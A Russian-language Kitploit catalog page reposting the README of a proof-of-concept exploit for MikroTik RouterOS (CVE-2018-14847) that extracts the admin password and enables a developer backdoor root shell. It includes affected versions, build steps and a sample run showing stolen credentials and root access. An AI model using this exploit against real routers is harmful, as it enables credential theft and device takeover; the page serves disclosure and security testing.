Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
routeros-CVE-2018-14847-bytheway — By the Way — это эксплойт, который позволяет получить root-шелл на устройствах Mikrotik под управлением RouterOS версий: | Kitploit
Инструменты/GitHubGitHub/babyshen/routeros-cve-2018-14847-bytheway
Безопасность встроенных системБезопасность IoTАтаки на ПаролиАнализ уязвимостейЭксплуатацияТестирование на Проникновение
GitHubbabyshen/routeros-cve-2018-14847-bytheway

routeros-CVE-2018-14847-bytheway

By the Way — это эксплойт, который позволяет получить root-шелл на устройствах Mikrotik под управлением RouterOS версий:

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
423 лет назадЕщё не проверено

By the Way

By the Way — это эксплойт, который позволяет получить root-оболочку на устройствах Mikrotik под управлением RouterOS следующих версий:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42.0
  • Beta: 6.29rc1 - 6.43rc3

Эксплойт использует уязвимость обхода пути CVE-2018-14847 для извлечения пароля администратора и создания пакета «option» для включения бэкдора разработчика. После эксплуатации атакующий может подключиться по Telnet или SSH, используя root-пользователя «devel» с паролем администратора.

Mikrotik исправила CVE-2018-14847 ещё в апреле. Однако, до написания этого PoC, я не думаю, что было публично раскрыто, что атаку можно использовать для записи файлов. Вы можете найти бюллетень безопасности Mikrotik здесь:

  • https://blog.mikrotik.com/security/winbox-vulnerability.html

Обратите внимание: хотя этот эксплойт написан для Winbox, его можно портировать на HTTP, если у вас есть предварительное знание учётных данных администратора.

Зависимости

Этот PoC зависит от:

  • Boost 1.66
  • pthread
  • cmake

Инструкции по сборке

root@kitploit:~
mkdir build
cd build
cmake ..
make

Пример использования

root@kitploit:~
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 
Login failed, incorrect username or password

Connection closed by foreign host.
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ ./btw -i 192.168.1.251

   ╔╗ ┬ ┬  ┌┬┐┬ ┬┌─┐  ╦ ╦┌─┐┬ ┬
   ╠╩╗└┬┘   │ ├─┤├┤   ║║║├─┤└┬┘
   ╚═╝ ┴    ┴ ┴ ┴└─┘  ╚╩╝┴ ┴ ┴ 

[+] Extracting passwords from 192.168.1.251:8291
[+] Searching for administrator credentials 
[+] Using credentials - admin:lol
[+] Creating /pckg/option on 192.168.1.251:8291
[+] Creating /flash/nova/etc/devel-login on 192.168.1.251:8291
[+] There's a light on
albinolobster@ubuntu:~/mikrotik/poc/bytheway/build$ telnet -l devel 192.168.1.251
Trying 192.168.1.251...
Connected to 192.168.1.251.
Escape character is '^]'.
Password: 


BusyBox v1.00 (2017.03.02-08:29+0000) Built-in shell (ash)
Enter 'help' for a list of built-in commands.

# uname -a
Linux MikroTik 3.3.5 #1 Thu Mar 2 08:16:25 UTC 2017 mips unknown
# cat /rw/logs/VERSION
v6.38.4 Mar/08/2017 09:26:17
# Connection closed by foreign host.
Скачать инструмент